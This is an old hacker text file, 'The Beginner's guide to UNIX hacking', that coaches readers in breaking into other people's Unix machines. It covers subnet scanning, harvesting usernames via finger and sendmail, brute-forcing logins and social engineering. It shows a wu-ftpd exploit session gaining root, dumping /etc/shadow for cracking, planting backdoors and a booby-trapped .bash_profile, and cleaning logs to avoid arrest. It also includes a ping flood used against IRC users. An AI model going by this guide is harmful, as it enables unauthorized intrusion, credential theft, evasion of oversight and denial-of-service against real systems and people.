++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\ + |---\ - - ----- - /---\ /---\ |--- /--\ /--\ + + | | / \ / \ | / \ | | | \ \ + + |--/ | | | | | === /---\ | | |-- \_ \_ + + | \ | | | | | / \ | | | \ \ + + | \ \_/ \_/ | / \ \__/ \__/ |___ \__/ \__/ + + ====================================================================== + + + + /---\ |---\ |--- \ / + + | | | | \ / + + | |--/ |-- \ - / + + | | \ | \ / \ / + + \__/ | \ |___ \_/ \_/ + \========================================================================/ ........................... ........................... .. .. .. The Beginner's guide .. .. to UNIX hacking .. ........................... ........................... by: grim ,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,,.. Ok done with the sloppy ass ascii art. The reason I am even writing this text is because of the incoming increase in questions like "how do I hack hotmail" or aol or another lame question. This text should explain to you that you have to actually know something to "hack." Read through the whole text if you are a beginner, and if you know a little, skip through and you should understand it. I will probably be adding to this text to make it include more info, and to make it easier to understand, the basic reason I wrote this is to STOP people from asking me and others how to do STUPID things yes it is STUPID to ask how to hack, it makes you look stupid and you will never be anything unless you can't teach yourself. I at first was just a kid in middle school who wanted to mess up people's computers. I asked people about virii and trojans, and used them, I was a lamer. I asked people in school and eventually found someone who was interested in hacking. He showed me some tricks, and i payed him money i wanted to learn so bad. He had been using unix for years, he told me to get a shell, I had no idea what he meant. He said it was access to a unix computer. I was still a little confused, but eventually I got the hang of using a shell instead of winshit. I read all I could, I spent all day on the computer, i started losing interest in socialization in the real world. I didn't care, I spent over 12 hours a day on the computer at that time, I read everything i could get a hold of, the very first text I read was the "mostly harmless hacking" text. It interested me, I only used the windows stuff at first like changing the shutdown screen and other simple things. I was making websites on hacking although i didn't know what it was, I would include tools for windows like trojans and virii although they weren't hacking it was something I liked at the time. I later got into mailbombers, flooders, DoS things. After I learned all of that (I realize that it is not hacking now don't flame me here) I started going back into getting shells. Well at that time all the free shells I could find just plain sucked. I heard a couple things about Linux. I asked my "hacker friend" at school, he said don't get Linux get a real UNIX. He moved to PA, and I have never heard from him since, I have tryed to track him down to thank him for what he has showed me but have had no luck. Well I got linux. The install was text based then but it ran fast, it was a lot more reliable than windows, never crashed. Well My 56k didn't work. I went on IRC and asked around #linux. I found out I had a modem called a "winmodem", I win-modem is a modem controlled by the software. They are generally slower than hardware modems and they don't work on linux. I played around with the command line seeing what things I could do, than I eventually raised $100 to buy a Linux compatible modem. I got it running. It was great. I have been using it ever since, and still am learning more about it. My parents say I am "addicted to the computer", I try to convince them I am not. I never seem to get bored with it, I always have something new to do with it. I have lost some friends in the time, hardly ever leaving my desk, I quit the Varsity Football Team, I was a starter, I have quit jobs, all just to use this damn machine I am starting to get pissed at myself so I will stop writing this boring paragraph. I hope someone out there finds this useful :) CONTENTS ============ (1.) Common knowledge (2.) Supplies (3.) Easy hacks (4.) What you need to do to get in (5.) Enumeration (6.) Common Mistakes leading to compromise (7.) Buffer overflows (8.) Firewalls (9.) What to do after getting in (10.) How to not get caught (11.) Log cleaning (12.) Finding a use for the newly rooted box (13.) My feelings on the bad hackers ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ DISCLAIMER ================ Ok by reading this text you agree to NOT hold me or anyone affiliated with r00t-access responsible for your actions. (1.) The best way to use this text is to read it once fully, than read it again and try out some things explained here. Ok now on with the text. When you read this text I am expecting you to have basic knowledge of what telnet is, some basic tcp/ip knowledge... If there is something little here you don't understand, don't hesitate to join #r00t-access on irc.dal.net, that is one of the places I hang out on. ------------------------------------------------------------------------------------------------------- SUPPLIES ========== (2.) Here listed is some supplies you will need throughout this tutorial, they can be obtained easily, at anti-secure.com and packetstorm.securify.com, just do a search for the names of the tools I list. 1. - superscan (for windows) 2. - nmap (for unix) 3. - full shell access (the very best is if you have linux or bsd or solaris or another unix OS) 4. - compiler on the shell 5. - wingates (you can use them as telnet proxys) That is it! ------------------------------------------------------------------------------------------------------ EASY TARGETS ============== (3.) Here I talk about finding easy targets. 1. - go to altavista.com search for "games" make the language Japanese or another language other than english, reason is these tend to be low on security 2. - Scan a Cable or DSL subnet for hosts with lots of services running, use nmap, make sure when it finds an open port the state is "open" not "closed" or "filtered" nmap's portscan report will tell you this, I will not explain how to use nmap since the man page shows you enough 3. - make sure nmap is installed, use the command I post below or similar to find hosts with lots of common unix services running- (NOTE: $ will represent a regular user shell in this text and # will be representing a superuser shell. I use 24.112.*.* as a sample, replace it with who you want to scan) $ nmap -p 21,23 24.112.*.* -------------------------------------------------------------------------------------------------- TO GET IN ============ (4.) To get in you will need to gather as much info on this host as you can, make sure it is a dumb SysAdmin, since this is your first hack. Then exploit the System, I will explain more on this and info getting later. ------------------------------------------------------------------------------------------------- ENUMERATION ============= (5,> Ok we have our target. Now to go further we need some info. First telnet to it's port 79, now if this is open you can possibly gain a user list of who is logged on.Just telnet in and press enter. Lets say it is enabled and allows you to view online users. Look at the example below- ----------------------------------------------------------------------------- $ telnet target.domain 79 Trying IPaddress... Connected to target.domain. Escape character is '^]'. Login Name Tty Idle Login Time Office Office Phone gt grahm crackhead /1 Sep 1 12:01 ----------------------------------------------------------------------------- Ok if you get a login write it down and try various logins for it. Maybe get Brutus, a telnet brute forcer which you can download for windows at- www.packetstorm.securify.com. Use that, try many wordlists. If you just got a "no one is logged on" message than perhaps you should get "haktek" for windows, you can also get that at- www.packetstorm.securify.com. Haktek will let you monitor the finger daemon for as long as you want and log to a file everyone who logs in. This can be usefull. Another way is to use the sendmail. If they have a lot of users try telneting in and trying to find some valid names, maybe even try brute forcing it with a program or a shell script you could type up. Look below, I give an example of a sendmail vulnerable to gathering valid logins- ----------------------------------------------------------------------------- $ telnet target.domain 25 Trying IPaddress... Connected to target.domain. Escape character is '^]'. 220 target.domain ESMTP Sendmail 8.9.3/8.9.3; Fri, 1 Sep 2000 12:11:00 -0400 expn wally 250 Wally Kolcun vrfy wally 250 Wally Kolcun expn Billy 550 BIlly... User Unknown ---------------------------------------------------------------------------- As you see above I telneted to their smtp daemon, issued "expn " and it told me if it was a real user, then at the end I showed an example of what would happen if the user did not exist, when I typed "expn Billy" it showed the user was unknown so it was not a valid login, this also helps you get their email address when you would do some social engineering. Another way of gathering usernames would be to search usenet, altavista, for that specific domain. If you search newsgroups for the domain, there may be some useful info on it, like a problem they are having maybe with setting permissions, which could get you in possibly. Other daemons to help you could be systat, netstat... Telnet can also help you figure out the OS, which can be important if you want to exploit it, some have the OS printed in the telnet login, like below: ---------------------------------------------------------------------------- Trying IPaddress... Connected to target.domain. Escape character is '^]'. Red Hat Linux release 6.1 (Cartman) Kernal 2.2.12-20 on an i586 login: .---------------------------------------------------------------------------- As you can see above the system we are cracking now is a redhat 6.1 box Social engineering can also get you somewhere, take the example of Kevin Mitnick, He used social engineering to get into Novell, a HUGE system. What he did was talked like he knew someone who was working there. He knew they were at vacation at the time, but he had their name. He called up Novell's offices and asked for the person, the secretary said she was on vacation, so he said he needed to get access from her, he was supposed to have. She gave him info that got him in. ---------------------------------------------------------------------------------------------------------- COMMON FLAWS =============== (6.) Sometimes people make mistakes. This can get you in. Some people just aren't good sysadmins. A very common flaw is people having trouble setting permissions, some have so much trouble they set things writable to everyone. This can be trouble. Lets have an example here. Someone sets the cron.daily writable for everyone. You could just upload somebackdoor and have it executed by the cron daemon which would escalate your access to the system. Now I will tell you about the most terrible thing to do. If a user ever uses IRC on the system, and if they also had dcc file send on autoexcept, also having the files go to their home directory, they could be sent a hacked up .bash_profile, if written correctly this could make them do something not wanted. Like adding a user when they logged in, or mailing someone a login/pass. This is absolutely the easiest way to get in. --------------------------------------------------------------------------------------------------------- BUFFER OVERFLOWS/EXPLOITING ================================ (7.) I am not going into buffer overflows too deep. I will just explain what they are so you understand and go into the next section. BUFFER OVERFLOWS- On daemons there is a thing called a buffer limit. The buffer limit limits the ================== amount of bytes that come in. Sometimes by issuing specific code you ca overflow the buffer and spawn a root shell or regular user shell. An example of this is the recent Buffer overflow in wu-ftpd 2.6.0 (1). Below I will show you it- ------------------------------------------------------------------------------ $ gcc wuftpd-god.c -o wuftpd-god $ ./wuftpd-god -h Usage: ./wuftpd-god -t [-l user/pass] [-s systype] [-o offset] [-g] [-h] [-x] [-m magic_str] [-r ret_addr] [-P padding] [-p pass_addr] [-M dir] target : host with any wuftpd user : anonymous user dir : if not anonymous user, you need to have writable directory magic_str : magic string (see exploit description) -g : enables magic string digging -x : enables test mode pass_addr : pointer to setproctitle argument ret_addr : this is pointer to shellcode systypes: 0 - RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm 1 - RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm 2 - SuSe 6.3 with wuftpd 2.6.0(1) from rpm 3 - SuSe 6.4 with wuftpd 2.6.0(1) from rpm 4 - RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm (test) 5 - FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from ports * 6 - FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from packages 7 - FreeBSD 3.4-RELEASE with wuftpd 2.6.0(1) from ports 8 - FreeBSD 4.0-RELEASE with wuftpd 2.6.0(1) from packages $ ./wuftpd-god -s0 -t target.domain Target: target.domain (ftp/): RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152 loggin into system.. USER ftp 331 Guest login ok, send your complete e-mail address as password. PASS 230-Next time please use your e-mail address as your password 230- for example: joe@cc456375-b.abdn1.md.home.com 230 Guest login ok, access restrictions apply. STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04] STEP 3 : Checking if we can reach our return address by format string Linux melmac 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp) # ------------------------------------------------------------------------------- If you want root generally an exploit is the way. Find the OS of the system then visit hack.co.za or packetstorm and search for that os, exploit and you should get some perl scripts/c scripts/shell scripts. Then just execute them as directed and you should have root. ------------------------------------------------------------------------------- Already got a root shell, that was pretty easy. Just 3 commands to compile get help and execute, a lot of times I think it is too easy. Ok, in some places you might want to know the actual root password in case they patch the exploit. so lets say you have a root shell. Issue the command as below- (it is /etc/passwd if they did not install shadowing utils) --------------------------------------------------------------- # cat /etc/shadow > /root/passwd root:34jk3h4jh3.,;8363:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: sympa:x:89:89:Sympa Mailing list manager:/home/sympa:/bin/bash gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/: xfs:x:100:103:X Font Server:/etc/X11/fs:/bin/false fax:x:10:14:Fax Master:/home/fax/:/bin/bash postfix:x:101:233:postfix:/var/spool/postfix: gdm:x:42:235::/home/gdm:/bin/bash grim:9hu.u8:501:501:grim:/home/grim:/bin/bash banal:x:102:236:BANAL Administrator:/home/banal:/bin/bash bleeb:36.34/363;86:502:506::/home/bleeb:/bin/bash --------------------------------------------------------------- The above command saved it as /root/passwd, but then you must crack it. Use john the ripper, it can be found at packetstorm and other places, I use it, it is so fast. Sometimes it takes years to crack a password so I don't suggest relying on cracking --------------------------------------------------------------------------------------------------------- FIREWALLS =========== (8.) Firewalls can't stop you if you know what you are doing. In this text I use nmap a lot, it is good for just about everything, nmap is short for network mapper. The newest version can be downloaded from www.insecure.org I love it's OS detection, it is so accurate, even wehn little services are running, it analyzes the tcp fingerprint, which it has a large database of. Ok enough on the greatness here is a simple option on nmap you can use to find the rules for firewalls. Issue "nmap -sA" . This Will check the firewalls rules. I don't want to go to deep into it to make this text extremely more boring than it is. If you would like to know more on this flag for nmap (a - in front of a option is a flag) just do "man nmap" at the shell prompt. --------------------------------------------------------------------------------------------------------- WHAT TO DO AFTER GETTING IN ============================== (9.) What to do after you get in depends on how you are going to use the system, if you want to use it to have an anonymous root shell then set up a backdoor. You can get backdoor's (trojans) at www.packetstorm.securify.com. I think you should be able to set up a backdoor on your own, but if for some reason you need help join #r00t-access on Dalnet and I can get you through but I will NOT crack into the systems for you, but I can help out occasionally if you need to secure your system... --------------------------------------------------------------------------------------------------------- HOW TO NOT GET CAUGHT ======================= (10.) Main thing is, DON'T be STUPID. If you want to keep the remote shell, don't deface the site, don't delete their files, try to leave the system as it was and delete the neccessary logs to do so, that is all I have to say on this section. --------------------------------------------------------------------------------------------------------- LOG CLEANING ================ (11.) Log cleaning is the most important part of staying there and not going to jail. Rid your login/hostname from logs, which on Linux are held in /var/log, and .bash_profile in your directory. The easiest way to do this is to use a log cleaner which you can get from blackcode.com or packetstorm. --------------------------------------------------------------------------------------------------------- FINDING A USE =============== (12.) I always have at least one rooted shell on me. I set up nmap and saint on them to hide my hostname, maybe run a web proxy/bnc on it. Saint is a great tool, it can tell you what a system is vulnerable to and can run remotely in your webbrowser with ease. Sometimes when people piss me off I decide to use a couple boxes and flood em'. like this- ---------------------------------------------------------------- # ping -f -c 50 -s 4500 IPaddress ......................................................... ........................................................... .........E...........E...EE........E..................E....... ..............E.......E.EEE...................E.E...... Host unreatchable. ---------------------------------------------------------------- People consider it lame but sometimes i want certain people to just shutup on IRC so I flood them. --------------------------------------------------------------------------------------------------------- THE BAD HACKER =================== (13.) In this text I have not been talking of hacking, in fact it is refered to as cracking. I don't mess up and systems and probably never will, not because I can't but because it is not right, plus if you got caught you would get more jail time for damage charges. I dislike people into totalling things. ---------------------------------------------------------------------------------------------------------- FINALLY I am fucking done. Ok below you can contact me for comments or questions, if you have questions please don't email me how to hack questions, join the chan, but be specific about your questions, I will be putting up a telnet BBS soon, join the chan for updates in the topic. CONTACT ============== AIM: mrflemmingsuck ---- AOL (yes i have actually been known to use it at times for windows): zor0d -------------------------------------------------------------------- email: grimR@antisecure.com or grim@r00taccess.dhs.org ------ IRC: irc.dal.net #r00t-access #zerosignal #bios and others... ---- ICQ: 54566262 ---- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ This text was by grimR, you are free to use this on your site and feel free to distribute it, just make sure you leave it as is and keep the credit to me :)